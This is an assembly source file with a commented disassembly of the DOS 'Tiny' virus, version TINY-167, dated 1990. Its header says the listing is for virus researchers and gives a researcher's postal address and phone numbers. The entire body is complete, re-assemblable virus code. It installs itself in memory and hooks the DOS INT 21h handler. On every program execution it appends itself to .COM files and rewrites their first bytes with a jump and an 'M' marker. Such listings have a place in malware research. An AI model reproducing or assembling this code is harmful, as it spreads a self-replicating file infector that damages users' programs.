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tiny-167.asm
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Assembly Source File
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1992-09-02
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4KB
|
177 lines
page ,132
name TINY167
title The 'Tiny' virus, version TINY-167
.radix 16
; ╔══════════════════════════════════════════════════════════════════════════╗
; ║ Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 ║
; ║ Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 ║
; ║ ║
; ║ The 'Tiny' Virus, version TINY-167 ║
; ║ Disassembled by Vesselin Bontchev, July 1990 ║
; ║ ║
; ║ Copyright (c) Vesselin Bontchev 1989, 1990 ║
; ║ ║
; ║ This listing is only to be made available to virus researchers ║
; ║ or software writers on a need-to-know basis. ║
; ╚══════════════════════════════════════════════════════════════════════════╝
; The disassembly has been tested by re-assembly using MASM 5.0.
code segment
assume cs:code, ds:code
org 100
seg_60 equ 600
v_len equ v_end-first4
start:
call v_entry ; Jump to virus code
db 'M' ; Virus signature
mov ax,4C00 ; Program terminate
int 21
; The original first 4 bytes of the infected file:
first4 db 0EBh, 2, 90, 90
v_entry:
pop si ; Determine the start addres of the virus body
add si,[si-2]
; Save the original first 4 bytes of the infected file on the stack:
push word ptr ds:[si-4]
push word ptr ds:[si-2]
push ax ; Save AX (to keep programs as DISKCOPY happy)
mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h)
xor cx,cx ; ES := 0
mov es,cx
mov cl,v_len-2 ; CX := virus length
lodsw ; Check if virus is present in memory
scasw
je run ; Just run the program if so
; Virus not in memory. Install it there:
dec di ; Adjust DI
dec di
stosw ; Store the first word of the virus body
rep movsb ; Store the rest of the virus
mov di,32*4 ; Old INT 21h handler will be moved to INT 32h
mov cl,2 ; The vector is 2 words long
mov ax,int_21-first4+seg_60 ; Offset
; Move the INT 21h handler to INT 32h and
; install int_21 as new INT 21h handler:
vect_cpy:
xchg ax,word ptr es:[di-(32-21)*4]
stosw
mov ax,es ; Segment
loop vect_cpy ; Loop until done
run:
mov di,offset start ; Point DI at program start
pop ax ; Restore AX
pop word ptr ds:[di+2] ; Restore the original first 4 bytes
pop word ptr ds:[di] ; of the file
push ds ; ES := DS
pop es
jmp di ; Go
int_21: ; New INT 21h handler
cmp ax,4B00 ; EXEC function call?
jne end_21 ; Exit if not
push ax ; Save registers used
push bx
push cx
push dx
push di
push ds
push es
push cs ; ES := CS
pop es
mov ax,3D02 ; Open the file for both reading and writting
int 32
jc end_exec ; Exit on error
xchg bx,ax ; Save the file handle in BX
mov ah,3F ; Read the first 4 bytes of the file
mov cx,4 ; 4 bytes to read
mov dx,seg_60 ; Put them in first4
mov di,dx ; Save first4 address in DI
push cs ; DS := CS
pop ds
int 32 ; Do it
; Check whether the file is already infected or is an .EXE file.
; The former contains the character `M' in its 3rd byte and
; the latter contains it either in the 0th or in the 1st byte.
push di ; Save DI
mov al,'M' ; Look for `M'
repne scasb
pop di ; Restore DI
je close ; Exit if file not suitable for infection
mov ax,4202 ; Seek to the end of file
xor cx,cx
xor dx,dx
int 32 ; Do it
push ax ; Save file length
mov dh,6 ; DX = 600h, i.e. point it at 0000:0600h
mov cl,v_len ; Length of virus body
mov ah,40 ; Append virus to file
int 32 ; Do it
mov ax,4200 ; Seek to the file beginning
xor cx,cx
xor dx,dx
int 32 ; Do it
mov dx,di ; Point DX at first4
mov al,0E8 ; Near CALL opcode
stosb ; Form the first instruction of the file
pop ax ; Restore file length in AX
inc ax
stosw ; Form the CALL's opperand
mov al,'M' ; Add a `M' character to mark the file
stosb ; as infected
mov cl,4 ; Overwrite the first 4 bytes of the file
mov ah,40
int 32 ; Do it
close:
mov ah,3E ; Close the file
int 32
end_exec:
pop es ; Restore used registers
pop ds
pop di
pop dx
pop cx
pop bx
pop ax
; Exit through the original INT 21h handler:
end_21:
jmp dword ptr cs:[32*4]
v_end equ $ ; End of virus body
code ends
end start